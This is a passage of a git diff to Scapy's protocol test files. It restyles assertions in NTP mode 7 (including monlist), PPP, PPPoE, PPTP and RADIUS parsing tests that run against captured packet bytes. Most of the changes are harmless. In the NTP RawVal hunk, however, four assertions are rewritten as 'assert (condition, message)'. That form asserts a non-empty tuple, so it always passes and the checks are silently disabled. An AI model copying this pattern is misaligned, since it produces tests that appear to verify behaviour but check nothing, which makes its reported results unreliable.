3) -assert(p.data[0].precision == 1) -assert(p.data[0].tolerance == 32768000) +assert isinstance(p, NTPPrivate) +assert p.response == 1 +assert p.more == 0 +assert p.version == 2 +assert p.mode == 7 +assert p.auth == 0 +assert p.request_code == 38 +assert p.nb_items == 1 +assert p.data_item_size == 60 +assert isinstance(p.data[0], NTPInfoKernel) +assert p.data[0].maxerror == 16000000 +assert p.data[0].esterror == 16000000 +assert p.data[0].status == 8257 +assert p.data[0].constant == 3 +assert p.data[0].precision == 1 +assert p.data[0].tolerance == 32768000 = NTP Private (mode 7) - REQ_MON_GETLIST_1 (1) - request s = b'\x17\x00\x03*\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 0) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.request_code == 42) -assert(p.nb_items == 0) -assert(p.data_item_size == 0) +assert isinstance(p, NTPPrivate) +assert p.response == 0 +assert p.more == 0 +assert p.version == 2 +assert p.mode == 7 +assert p.request_code == 42 +assert p.nb_items == 0 +assert p.data_item_size == 0 = NTP Private (mode 7) - REQ_MON_GETLIST_1 (2) - response s = b'\xd7\x00\x03*\x00\x06\x00H\x00\x00\x00;\x00\x00\x00;\x00\x00\x01\xd0\x00\x00\x00\x01\x94mw\xe9\xc0\xa8zg\x00\x00\x00\x01\x00{\x03\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00;\x00\x00\x00;\x00\x00\x01\xd0\x00\x00\x00\x01\x13\xb6\xa9J\xc0\xa8zg\x00\x00\x00\x01\x00{\x03\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00;\x00\x00\x00;\x00\x00\x01\xd0\x00\x00\x00\x01\xbb]\x81\xea\xc0\xa8zg\x00\x00\x00\x01\x00{\x03\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00;\x00\x00\x00;\x00\x00\x01\xd0\x00\x00\x00\x01\xfc\xbf\xd5a\xc0\xa8zg\x00\x00\x00\x01\x00{\x03\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00;\x00\x00\x00;\x00\x00\x01\xd0\x00\x00\x00\x01\xbe\x10x\xa8\xc0\xa8zg\x00\x00\x00\x01\x00{\x03\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00;\x00\x00\x00;\x00\x00\x01\xd0\x00\x00\x00\x01\xde[ng\xc0\xa8zg\x00\x00\x00\x01\x00{\x03\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 1) -assert(p.more == 1) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.request_code == 42) -assert(p.nb_items == 6) -assert(p.data_item_size == 72) +assert isinstance(p, NTPPrivate) +assert p.response == 1 +assert p.more == 1 +assert p.version == 2 +assert p.mode == 7 +assert p.request_code == 42 +assert p.nb_items == 6 +assert p.data_item_size == 72 = NTP Private (mode 7) - REQ_IF_STATS (1) - request s = b'\x17\x80\x03,\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdb9\xeb\xdd\x8cH\xefe\x00\x00\x00\x01\x8b\xfb\x90u\xa8ad\xe8\x87\xca\xbf\x96\xd2\x9d\xddI' p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 0) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.auth == 1) -assert(p.request_code == 44) -assert(p.nb_items == 0) -assert(p.data_item_size == 0) -assert(hasattr(p, 'authenticator')) -assert(p.authenticator.key_id == 1) -assert(bytes_hex(p.authenticator.dgst) == b'8bfb9075a86164e887cabf96d29ddd49') +assert isinstance(p, NTPPrivate) +assert p.response == 0 +assert p.more == 0 +assert p.version == 2 +assert p.mode == 7 +assert p.auth == 1 +assert p.request_code == 44 +assert p.nb_items == 0 +assert p.data_item_size == 0 +assert hasattr(p, 'authenticator') +assert p.authenticator.key_id == 1 +assert bytes_hex(p.authenticator.dgst) == b'8bfb9075a86164e887cabf96d29ddd49' = NTP Private (mode 7) - REQ_IF_STATS (2) - response s = b"\xd7\x00\x03,\x00\x03\x00\x88\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x01lo\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x07\x00\x00\x00\x00\x00\n\x00\x01\x00\x00\x00\x00\xfe\x80\x00\x00\x00\x00\x00\x00\n\x00'\xff\xfe\xe3\x81r\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01eth0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x06\x00\x00\x00\x00\x00\n\x00\x01\x00\x00\x00\x00\xfe\x80\x00\x00\x00\x00\x00\x00\n\x00'\xff\xfe\xa0\x1d\xd0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01eth1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x05\x00\x00\x00\x00\x00\n\x00\x01\x00\x00\x00\x00" p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 1) -assert(p.more == 1) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.auth == 0) -assert(p.request_code == 44) -assert(p.err == 0) -assert(p.nb_items == 3) -assert(p.data_item_size == 136) -assert(isinstance(p.data[0], NTPInfoIfStatsIPv6)) -assert(p.data[0].unaddr == "::1") -assert(p.data[0].unmask == "ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff") -assert(p.data[0].ifname.startswith(b"lo")) +assert isinstance(p, NTPPrivate) +assert p.response == 1 +assert p.more == 1 +assert p.version == 2 +assert p.mode == 7 +assert p.auth == 0 +assert p.request_code == 44 +assert p.err == 0 +assert p.nb_items == 3 +assert p.data_item_size == 136 +assert isinstance(p.data[0], NTPInfoIfStatsIPv6) +assert p.data[0].unaddr == "::1" +assert p.data[0].unmask == "ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff" +assert p.data[0].ifname.startswith(b"lo") = NTP Private (mode 7) - REQ_IF_STATS (3) - response s = b'\xd7\x01\x03,\x00\x03\x00\x88\xc0\xa8ze\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\xa8z\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00eth1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x19\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x11\x00\x00\x00\x00\x00\x00\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x02\x00\x02\x00\x01\x00\x00\x00\x00\n\x00\x02\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\n\x00\x02\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00eth0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x19\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00\x00\x7f\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00lo\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00\x00' p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 1) -assert(p.more == 1) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.auth == 0) -assert(p.request_code == 44) -assert(p.err == 0) -assert(p.nb_items == 3) -assert(p.data_item_size == 136) -assert(isinstance(p.data[0], NTPInfoIfStatsIPv4)) -assert(p.data[0].unaddr == "192.168.122.101") -assert(p.data[0].unmask == "255.255.255.0") -assert(p.data[0].ifname.startswith(b"eth1")) +assert isinstance(p, NTPPrivate) +assert p.response == 1 +assert p.more == 1 +assert p.version == 2 +assert p.mode == 7 +assert p.auth == 0 +assert p.request_code == 44 +assert p.err == 0 +assert p.nb_items == 3 +assert p.data_item_size == 136 +assert isinstance(p.data[0], NTPInfoIfStatsIPv4) +assert p.data[0].unaddr == "192.168.122.101" +assert p.data[0].unmask == "255.255.255.0" +assert p.data[0].ifname.startswith(b"eth1") = NTP Private (mode 7) - REQ_IF_RELOAD (1) - request s = b'\x17\x80\x03-\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdb9\xed\xa3\xdc\x7f\xc6\x11\x00\x00\x00\x01\xfb>\x96*\xe7O\xf7\x8feh\xd4\x07L\xc0\x08\xcb' p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 0) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.auth == 1) -assert(p.request_code == 45) -assert(p.nb_items == 0) -assert(p.data_item_size == 0) -assert(hasattr(p, 'authenticator')) -assert(p.authenticator.key_id == 1) -assert(bytes_hex(p.authenticator.dgst) == b'fb3e962ae74ff78f6568d4074cc008cb') +assert isinstance(p, NTPPrivate) +assert p.response == 0 +assert p.more == 0 +assert p.version == 2 +assert p.mode == 7 +assert p.auth == 1 +assert p.request_code == 45 +assert p.nb_items == 0 +assert p.data_item_size == 0 +assert hasattr(p, 'authenticator') +assert p.authenticator.key_id == 1 +assert bytes_hex(p.authenticator.dgst) == b'fb3e962ae74ff78f6568d4074cc008cb' = NTP Private (mode 7) - REQ_IF_RELOAD (2) - response s = b'\xd7\x00\x03-\x00\x03\x00\x88\x7f\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00lo\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xf4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00\x00\n\x00\x02\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\n\x00\x02\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00eth0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x19\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x13\x00\x00\x00\x00\x00\x00\x01\xf4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x05\x00\x02\x00\x01\x00\x00\x00\x00\xc0\xa8ze\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\xa8z\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00eth1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x19\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00=\x00\x00\x00}\x00\x00\x00\x00\x00\x00\x01\xf4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\t\x00\x02\x00\x01\x00\x00\x00\x00' p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 1) -assert(p.more == 1) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.auth == 0) -assert(p.request_code == 45) -assert(p.err == 0) -assert(p.nb_items == 3) -assert(p.data_item_size == 136) -assert(isinstance(p.data[0], NTPInfoIfStatsIPv4)) -assert(p.data[0].unaddr == "127.0.0.1") -assert(p.data[0].unmask == "255.0.0.0") -assert(p.data[0].ifname.startswith(b"lo")) +assert isinstance(p, NTPPrivate) +assert p.response == 1 +assert p.more == 1 +assert p.version == 2 +assert p.mode == 7 +assert p.auth == 0 +assert p.request_code == 45 +assert p.err == 0 +assert p.nb_items == 3 +assert p.data_item_size == 136 +assert isinstance(p.data[0], NTPInfoIfStatsIPv4) +assert p.data[0].unaddr == "127.0.0.1" +assert p.data[0].unmask == "255.0.0.0" +assert p.data[0].ifname.startswith(b"lo") ############ ############ @@ -1115,15 +1115,15 @@ pkt_1 = NTP( sent=RawVal(time_stamp), ) -assert(isinstance(pkt_1.precision, RawVal)), type(pkt_1.precision) -assert(isinstance(pkt_1.dispersion, RawVal)), type(pkt_1.dispersion) -assert(isinstance(pkt_1.orig, RawVal)), type(pkt_1.orig) -assert(isinstance(pkt_1.sent, RawVal)), type(pkt_1.sent) +assert (isinstance(pkt_1.precision, RawVal)), type(pkt_1.precision) +assert (isinstance(pkt_1.dispersion, RawVal)), type(pkt_1.dispersion) +assert (isinstance(pkt_1.orig, RawVal)), type(pkt_1.orig) +assert (isinstance(pkt_1.sent, RawVal)), type(pkt_1.sent) -assert(pkt_1.precision.val == precision), pkt_1.precision.val -assert(pkt_1.dispersion.val == dispersion), pkt_1.dispersion.val -assert(pkt_1.orig.val == time_stamp), pkt_1.orig.val -assert(pkt_1.sent.val == time_stamp), pkt_1.sent.val +assert (pkt_1.precision.val == precision, pkt_1.precision.val) +assert (pkt_1.dispersion.val == dispersion, pkt_1.dispersion.val) +assert (pkt_1.orig.val == time_stamp, pkt_1.orig.val) +assert (pkt_1.sent.val == time_stamp, pkt_1.sent.val) time_stamp_hex = 0x00000000e67d6774 pkt_2 = NTP( @@ -1137,4 +1137,4 @@ raw_pkt = (b"#\x02\n\xec\x00\x00\x00\x00\x00\x00\xf2\xce\x7f\x00\x00\x01\x00" b"\x00\x00\x00\x00\x00\x00\x00\xe6}gt\x00\x00\x00\x00\x00\x00\x00" b"\x00\x00\x00\x00\x00\xe6}gt\x00\x00\x00\x00") -assert(raw(pkt_1) == raw(pkt_2) == raw_pkt) \ No newline at end of file +assert raw(pkt_1) == raw(pkt_2) == raw_pkt \ No newline at end of file diff --git a/test/scapy/layers/ppp.uts b/test/scapy/layers/ppp.uts index ece97bd3ef0..daa6a933a4d 100644 --- a/test/scapy/layers/ppp.uts +++ b/test/scapy/layers/ppp.uts @@ -8,20 +8,20 @@ ~ ppp pppoe p=Ether(b'\xff\xff\xff\xff\xff\xff\x08\x00\x27\xf3<5\x88c\x11\x09\x00\x00\x00\x0c\x01\x01\x00\x00\x01\x03\x00\x04\x01\x02\x03\x04\x00\x00\x00\x00') p -assert(p[Ether].type==0x8863) -assert(PPPoED in p) -assert(p[PPPoED].version==1) -assert(p[PPPoED].type==1) -assert(p[PPPoED].code==0x09) -assert(PPPoED_Tags in p) +assert p[Ether].type==0x8863 +assert PPPoED in p +assert p[PPPoED].version==1 +assert p[PPPoED].type==1 +assert p[PPPoED].code==0x09 +assert PPPoED_Tags in p q=p[PPPoED_Tags] -assert(q.tag_list is not None) +assert q.tag_list is not None r=q.tag_list -assert(r[0].tag_type==0x0101) -assert(r[1].tag_type==0x0103) -assert(r[1].tag_len==4) -assert(r[1].tag_value==b'\x01\x02\x03\x04') -assert(r[2].tag_type==0x0000) +assert r[0].tag_type==0x0101 +assert r[1].tag_type==0x0103 +assert r[1].tag_len==4 +assert r[1].tag_value==b'\x01\x02\x03\x04' +assert r[2].tag_type==0x0000 = PPPoE with padding ~ ppp pppoe @@ -36,43 +36,43 @@ p = HDLC()/PPP()/PPP_IPCP() p s = raw(p) s -assert(s == b'\xff\x03\x80!\x01\x00\x00\x04') +assert s == b'\xff\x03\x80!\x01\x00\x00\x04' p = PPP(s) p -assert(HDLC in p) -assert(p[HDLC].control==3) -assert(p[PPP].proto==0x8021) +assert HDLC in p +assert p[HDLC].control==3 +assert p[PPP].proto==0x8021 q = PPP(s[2:]) q -assert(HDLC not in q) -assert(q[PPP].proto==0x8021) +assert HDLC not in q +assert q[PPP].proto==0x8021 = PPP IPCP ~ ppp ipcp p = PPP(b'\x80!\x01\x01\x00\x10\x03\x06\xc0\xa8\x01\x01\x02\x06\x00-\x0f\x01') p -assert(p[PPP_IPCP].code == 1) -assert(p[PPP_IPCP_Option_IPAddress].data=="192.168.1.1") -assert(p[PPP_IPCP_Option].data == b'\x00-\x0f\x01') +assert p[PPP_IPCP].code == 1 +assert p[PPP_IPCP_Option_IPAddress].data=="192.168.1.1" +assert p[PPP_IPCP_Option].data == b'\x00-\x0f\x01' p=PPP()/PPP_IPCP(options=[PPP_IPCP_Option_DNS1(data="1.2.3.4"),PPP_IPCP_Option_DNS2(data="5.6.7.8"),PPP_IPCP_Option_NBNS2(data="9.10.11.12")]) r = raw(p) r -assert(r == b'\x80!\x01\x00\x00\x16\x81\x06\x01\x02\x03\x04\x83\x06\x05\x06\x07\x08\x84\x06\t\n\x0b\x0c') +assert r == b'\x80!\x01\x00\x00\x16\x81\x06\x01\x02\x03\x04\x83\x06\x05\x06\x07\x08\x84\x06\t\n\x0b\x0c' q = PPP(r) q -assert(raw(p) == raw(q)) -assert(PPP(raw(q))==q) +assert raw(p) == raw(q) +assert PPP(raw(q))==q p = PPP()/PPP_IPCP(options=[PPP_IPCP_Option_DNS1(data="1.2.3.4"),PPP_IPCP_Option_DNS2(data="5.6.7.8"),PPP_IPCP_Option(type=123,data="ABCDEFG"),PPP_IPCP_Option_NBNS2(data="9.10.11.12")]) p r = raw(p) r -assert(r == b'\x80!\x01\x00\x00\x1f\x81\x06\x01\x02\x03\x04\x83\x06\x05\x06\x07\x08{\tABCDEFG\x84\x06\t\n\x0b\x0c') +assert r == b'\x80!\x01\x00\x00\x1f\x81\x06\x01\x02\x03\x04\x83\x06\x05\x06\x07\x08{\tABCDEFG\x84\x06\t\n\x0b\x0c' q = PPP(r) q -assert( q[PPP_IPCP_Option].type == 123 ) -assert( q[PPP_IPCP_Option].data == b"ABCDEFG" ) -assert( q[PPP_IPCP_Option_NBNS2].data == '9.10.11.12' ) +assert q[PPP_IPCP_Option].type == 123 +assert q[PPP_IPCP_Option].data == b"ABCDEFG" +assert q[PPP_IPCP_Option_NBNS2].data == '9.10.11.12' = PPP ECP @@ -82,27 +82,27 @@ p = PPP()/PPP_ECP(options=[PPP_ECP_Option_OUI(oui=0x58595a)]) p r = raw(p) r -assert(r == b'\x80S\x01\x00\x00\n\x00\x06XYZ\x00') +assert r == b'\x80S\x01\x00\x00\n\x00\x06XYZ\x00' q = PPP(r) q -assert(raw(p) == raw(q)) +assert raw(p) == raw(q) p = PPP()/PPP_ECP(options=[PPP_ECP_Option_OUI(oui=0x58595a),PPP_ECP_Option(type=1,data="ABCDEFG")]) p r = raw(p) r -assert(r == b'\x80S\x01\x00\x00\x13\x00\x06XYZ\x00\x01\tABCDEFG') +assert r == b'\x80S\x01\x00\x00\x13\x00\x06XYZ\x00\x01\tABCDEFG' q = PPP(r) q -assert( raw(p) == raw(q) ) -assert( q[PPP_ECP_Option].data == b"ABCDEFG" ) +assert raw(p) == raw(q) +assert q[PPP_ECP_Option].data == b"ABCDEFG" = PPP with only one byte for protocol ~ ppp -assert(len(raw(PPP() / IP())) == 21) +assert len(raw(PPP() / IP())) == 21 p = PPP(b'!E\x00\x00<\x00\x00@\x008\x06\xa5\xce\x85wP)\xc0\xa8Va\x01\xbbd\x8a\xe2}r\xb8O\x95\xb5\x84\xa0\x12q \xc8\x08\x00\x00\x02\x04\x02\x18\x04\x02\x08\nQ\xdf\xd6\xb0\x00\x07LH\x01\x03\x03\x07Ao') -assert(IP in p) -assert(TCP in p) +assert IP in p +assert TCP in p diff --git a/test/scapy/layers/pptp.uts b/test/scapy/layers/pptp.uts index 9eebecc6377..880d3401b2b 100644 --- a/test/scapy/layers/pptp.uts +++ b/test/scapy/layers/pptp.uts @@ -148,7 +148,7 @@ conf_nak = PPP() / PPP_LCP_Configure(code='Configure-Nak', id=42, options=[PPP_LCP_MRU_Option(), PPP_LCP_ACCM_Option(accm=0xffff0000)]) conf_nak_ref_data = hex_bytes('c021032a000e010405dc0206ffff0000') -assert(raw(conf_nak) == conf_nak_ref_data) +assert raw(conf_nak) == conf_nak_ref_data conf_nak_pkt = PPP(conf_nak_ref_data) @@ -174,7 +174,7 @@ conf_reject = PPP() / PPP_LCP_Configure(code='Configure-Reject', id=42, message='test')]) conf_reject_ref_data = hex_bytes('c021042a000b0d070274657374') -assert(raw(conf_reject) == conf_reject_ref_data) +assert raw(conf_reject) == conf_reject_ref_data conf_reject_pkt = PPP(conf_reject_ref_data) @@ -202,7 +202,7 @@ conf_req = PPP() / PPP_LCP_Configure(id=42, options=[PPP_LCP_MRU_Option(max_recv PPP_LCP_Callback_Option(operation='Distinguished name',message='test')]) conf_req_ref_data = hex_bytes('c021012a0027010413880206f0f0f0f00304c0230408c025746573740506000010920d070474657374') -assert(raw(conf_req) == conf_req_ref_data) +assert raw(conf_req) == conf_req_ref_data conf_req_pkt = PPP(conf_req_ref_data) @@ -230,7 +230,7 @@ assert options[5].message == b'test' pap = PPP_LCP_Auth_Protocol_Option() pap_ref_data = hex_bytes('0304c023') -assert(raw(pap) == pap_ref_data) +assert raw(pap) == pap_ref_data pap_pkt = PPP_LCP_Option(pap_ref_data) assert isinstance(pap_pkt, PPP_LCP_Auth_Protocol_Option) diff --git a/test/scapy/layers/radius.uts b/test/scapy/layers/radius.uts index 5c8d254213c..7a428b3621c 100644 --- a/test/scapy/layers/radius.uts +++ b/test/scapy/layers/radius.uts @@ -16,47 +16,47 @@ Radius in p and len(p[Radius].attributes) == 1 and p[Radius].attributes[0].value = RADIUS - Access-Request - Dissection (1) s = 